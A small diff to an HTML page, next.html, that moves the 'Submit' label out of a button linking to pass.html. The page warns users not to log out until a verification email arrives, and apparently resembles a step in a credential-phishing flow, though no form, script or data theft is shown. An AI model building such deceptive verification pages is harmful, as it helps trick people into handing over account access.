--- a/next.html
+++ b/next.html
@@ -71,7 +71,7 @@
            <p class="msi-4">**Please make sure account not to log out from your computer or laptop until you have received a verification email.</p><br>
      
            <div class="container">
-           <button> <a href="pass.html"> Submit</a> </button>
+           <button> <a href="pass.html"> </a> </button>
                <p>
                  Submit
                </p>
